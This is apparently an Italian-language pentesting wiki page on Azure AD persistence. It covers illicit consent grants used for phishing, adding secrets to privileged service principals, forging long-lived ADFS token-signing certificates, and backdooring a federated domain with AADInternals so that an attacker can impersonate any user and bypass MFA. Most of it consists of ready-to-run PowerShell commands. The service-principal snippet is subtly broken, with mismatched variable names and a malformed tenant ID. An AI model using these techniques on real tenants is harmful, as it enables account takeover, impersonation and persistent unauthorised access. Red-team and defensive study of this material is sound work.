Az - Persistence

Concessione Illecita di Consenso

Per impostazione predefinita, qualsiasi utente può registrare un'applicazione in Azure AD. Quindi è possibile registrare un'applicazione (solo per il tenant di destinazione) che richiede autorizzazioni ad alto impatto con il consenso dell'amministratore (approvarlo se sei l'amministratore) - come l'invio di email per conto di un utente, la gestione dei ruoli ecc. Questo ci permetterà di eseguire attacchi di phishing che sarebbero molto fruttuosi in caso di successo.

Inoltre, potresti anche accettare quell'applicazione con il tuo utente come modo per mantenere l'accesso su di essa.

Applicazioni e Principali dei Servizi

Con i privilegi di Amministratore dell'Applicazione, GA o un ruolo personalizzato con le autorizzazioni microsoft.directory/applications/credentials/update, possiamo aggiungere credenziali (segreto o certificato) a un'applicazione esistente.

È possibile mirare a un'applicazione con autorizzazioni elevate o aggiungere una nuova applicazione con autorizzazioni elevate.

Un ruolo interessante da aggiungere all'applicazione sarebbe il ruolo di amministratore dell'autenticazione privilegiata poiché consente di reimpostare la password degli Amministratori Globali.

Questa tecnica consente anche di bypassare l'MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Per l'autenticazione basata su certificato

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federazione - Certificato di firma del token

Con privilegi DA sull'AD locale, è possibile creare e importare nuovi certificati di firma del token e certificati di decrittazione del token che hanno una validità molto lunga. Ciò ci permetterà di effettuare il login come qualsiasi utente di cui conosciamo l'ImuutableID.

Esegui il comando seguente come DA sui server ADFS per creare nuovi certificati (password predefinita 'AADInternals'), aggiungerli ad ADFS, disabilitare il rollover automatico e riavviare il servizio:

New-AADIntADFSSelfSignedCertificates

Quindi, aggiorna le informazioni del certificato con Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federazione - Dominio Affidabile

Con i privilegi GA su un tenant, è possibile aggiungere un nuovo dominio (deve essere verificato), configurare il suo tipo di autenticazione su Federato e configurare il dominio per affidarsi a un certificato specifico (any.sts nel comando sottostante) e emittente:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Riferimenti

• https://aadinternalsbackdoor.azurewebsites.net/